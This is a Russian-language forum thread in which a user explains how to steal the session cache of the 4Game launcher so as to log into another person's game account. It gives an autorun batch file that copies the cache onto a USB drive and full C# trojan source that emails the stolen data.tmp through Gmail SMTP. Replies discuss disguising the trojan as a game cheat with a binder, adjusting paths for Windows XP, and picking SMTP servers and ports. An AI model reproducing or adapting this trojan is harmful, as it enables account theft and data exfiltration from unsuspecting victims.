Доброго времени суток)
суть уязвимости заключаться в том что бы получить кэш зопускатра и с помощью его зайти на акк "Друга".
...
кэш храниться:
C:\Users\имя пользователя\AppData\Local\4GameZapuskatr
в файле:
data.tmp
....
открываем файл блокнотом и ищем такие строки
path=/\0\0\0\xfeinn-user=набор букав
"набор букав" - является кэшем.
...
чтобы зайти на акк
[Ссылки могут видеть только зарегистрированные и активированные пользователи]"набор букав"
...
теперь перейдем к самому сложному)
тырить кэш мы будим с помощью троя:elefant:
для этого можно найти какой нить "генератор" для создания, или написать самому...

тырим кэш через флешку
самый простой и геморройный способ
для начала нам нужно создать бат файл
@echo off
md J:\111\
CD /D %userprofile%\AppData\Local\4GameZapuskatr >nul
copy data.tmp J:\111\ >nul
и файл для авто запуска "autorun.inf"

[autorun]
open=ololo.exe
UseAutoPlay=1

все, теперь кидаем это все на флеху и несем "другу"
ps геморрой потому что мы не знаем на какой "диск" будет флеха. те C,D,D,E,F,J И ТП...

тырим кэш троем(отсылка на мыло)

для этого нам нужна "visual studio"
качаем устанавливаем и тп...
1 запускаем студию
2 создаем проект(консольный)
3 пишем название проекста, путь и тп...
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
пишем такой код:
using System;
using System.Collections.Generic;
using System.Text;
using System.Net.Mail;
using System.Net.Mime;
using System.Web;
using System.IO;

namespace Ololo
{
class Program
{
static void Main(string[] args)
{

DirectoryInfo FromFoGameZap = new DirectoryInfo(@"C:\users\" + Environment.UserName + @"\AppData\Local\4GameZapuskatr\");
DirectoryInfo ToFoGameZap = new DirectoryInfo("C:\\Temp\\FoGameZap");
Copydesk(FromFoGameZap, ToFoGameZap);
sendMail();
}

///функция копирования файлов\папок
static public void Copydesk(DirectoryInfo soursDir, DirectoryInfo destDir)
{

if (!destDir.Exists) destDir.Create();
if (!soursDir.Exists) soursDir.Create();
while (true)
{
DirectoryInfo[] dirs = soursDir.GetDirectories();
if (dirs.Length > 0)
{
foreach (DirectoryInfo di in dirs)
{
DirectoryInfo dir = new DirectoryInfo(destDir.FullName.ToString() + "\\" + di.Name.ToString());
Copydesk(di, dir);
}
break;
}
else if (dirs.Length < 0) ;
{
break;
}
}
if (!soursDir.Exists) soursDir.Create();
if (!destDir.Exists) destDir.Create();
while (true)
{
FileInfo[] fls = soursDir.GetFiles();
if (fls.Length > 0)
{
foreach (FileInfo fi in fls)
{
fi.CopyTo(destDir.FullName.ToString() + "\\" + fi.Name.ToString(), true);
}
break;
}
else if (fls.Length < 0) ;
{
break;
}
}
}

///функция отправки почты
static public void sendMail()
{
SmtpClient client = new SmtpClient("smtp.gmail.com", 587);
client.EnableSsl = true;
client.Credentials = new System.Net.NetworkCredential("мыло троя", "пароль");
MailMessage msg = new MailMessage();
msg.From = new MailAddress("мыло троя");
msg.To.Add(new MailAddress("ваше мыло"));
msg.Subject = "ololo"; ///заголовок письма
msg.Body = "ololo" + " UserName: " + Environment.UserName + " DomainName: " + Environment.UserDomainName + " OSver: " + Environment.OSVersion;
msg.SubjectEncoding = System.Text.Encoding.UTF8;
msg.BodyEncoding = System.Text.UTF8Encoding.UTF8;
string file = String.Format("C:\\Temp\\FoGameZap\\data.tmp");
Attachment attach = new Attachment(file);
ContentDisposition disposition = attach.ContentDisposition;
client.Timeout = 999999999;
msg.Attachments.Add(attach);
try
{
client.Send(msg);
}
catch { }
}
}
}

жмем f5.
все!!
заходим в папку с проектом и в папке "debug" находим наш ехешник.

для скрытия консоли(черного окошка троя)
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
выбираем виндовс апликашен
[Ссылки могут видеть только зарегистрированные и активированные пользователи]

исходник ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

warl0ck Эт типа ломануть акк? или когда забанили можно зайти на акк?

warl0ck Эт типа ломануть акк? или когда забанили можно зайти на акк?

"ломануть акк", кароч фэйк, ток не нужно жертве вводить логин пароль

Слушай,я можно ли его замаскировать под какой типо чит,или файлик вх который на ф5 включается)?

вот гдет месяца 3 делал фейки с вводом лога и паса 73 акк подарили мне нубо пользователи

Слушай,я можно ли его замаскировать под какой типо чит,или файлик вх который на ф5 включается)?

можно склеить джойнером(в сети их полно), ф5 нужно нажать только чтобы код "сделался" в ехе файл, те чтобы запустить трой нужно лишь запустить .ехе и все

warl0ck Не мог бы скинуть готовый файл просто не очень шарю в этом.

warl0ck Не мог бы скинуть готовый файл просто не очень шарю в этом.
прикрепил в теме
исходник ([Ссылки могут видеть только зарегистрированные и активированные пользователи])

У меня вобще data.tmp находиться в дириктории
K:\Documents and Settings\Пользователь\Local Settings\Application Data\4GameZapuskatr

У меня вобще data.tmp находиться в дириктории
K:\Documents and Settings\Пользователь\Local Settings\Application Data\4GameZapuskatr
эх забыл сказать что в вин7 и хп пути разные...
для хп надо так писать

DirectoryInfo FromFoGameZap = new DirectoryInfo(@"C:\Documents and Settings\" + Environment.UserName + @"\Local Settings\Application Data\4GameZapuskatr");

эх забыл сказать что в вин7 и хп пути разные...
для хп надо так писать

DirectoryInfo FromFoGameZap = new DirectoryInfo(@"C:\Documents and Settings\" + Environment.UserName + @"\Local Settings\Application Data\4GameZapuskatr");


Спасибо!


А еще Тоесть надо писать @"C:\Documents and Settings\" это у кого системный С:\ а мне надо писать значит
@"K:\Documents and Settings\"

warl0ck - Можешь если не трудно расписать чтоб можнобыло на нескольких системных тоесть типо %userprofile%\AppData\Local\ чтоб не прописывать диски!?

ТИПО ТАКОГО
(@"C:\Documents and Settings\" - вместо C:\Documents and Settings
%USERPROFILE%\ - такое

Спасибо!


А еще Тоесть надо писать @"C:\Documents and Settings\" это у кого системный С:\ а мне надо писать значит
@"K:\Documents and Settings\"

warl0ck - Можешь если не трудно расписать чтоб можнобыло на нескольких системных тоесть типо %userprofile%\AppData\Local\ чтоб не прописывать диски!?

ТИПО ТАКОГО
(@"C:\Documents and Settings\" - вместо C:\Documents and Settings
%USERPROFILE%\ - такое

да вот сижу тетсю эти переменные.... нашел Environment.SpecialFolder.UserProfile... думаю диск нужно будет указывать хз...

warl0ck не укозал еще это
SmtpClient client = new SmtpClient("smtp.gmail.com", 587);
Указываем ваше мыло тоесть сайт зареганого мыла!
Вместо этого (smtp.gmail.com)
smtp.yandex.ru
smtp.mail.ru

587 - я так понял это порт?

warl0ck не укозал еще это
SmtpClient client = new SmtpClient("smtp.gmail.com", 587);
То что надо ставить то что у вас и где тоисть!
Вместо этого (smtp.gmail.com)
smtp.yandex.ru
smtp.mail.ru

587 - я так понял это порт?

да это порт, 2525 - вроде как у мейла.ру

warl0ck залей на slil.ru у мя дамп не открывает

warl0ck залей на slil.ru у мя дамп не открывает

[Ссылки могут видеть только зарегистрированные и активированные пользователи]

да это порт, 2525 - вроде как у мейла.ру
У меня и с 587 работает прекрасно!:rolleyeyes:

У меня и с 587 работает прекрасно!:rolleyeyes:

это и хорошо, 25 забит часто:forward:
эээм попробуй Environment.GetFolderPath(Environment.SpecialFolde r.UserProfile))

А забыл Главное а че с кешом то делать?

А забыл Главное а че с кешом то делать?

[Ссылки могут видеть только зарегистрированные и активированные пользователи]

[Ссылки могут видеть только зарегистрированные и активированные пользователи] 5hMz6_pi4YURj_T9tmExFZzCOHrJws8SjofMeEqHOuLUTdevnl _1PIq53xA ([Ссылки могут видеть только зарегистрированные и активированные пользователи] havyK5hMz6_pi4YURj_T9tmExFZzCOHrJws8SjofMeEqHOuLUT devnl_1PIq53xA)

Ясно обьясни еще пожалуйста куда это вставить:sceptic:


Environment.GetFolderPath(Environment.SpecialFolde r.UserProfile))

Ясно обьясни еще пожалуйста куда это вставить:sceptic:

ээм ну это твой %userprofile%, запили куда нить:pandal:
зы потеснить на хп не могу...

ээм ну это твой %userprofile%, запили куда нить:pandal:
зы потеснить на хп не могу...
Ну щя тогда попробую)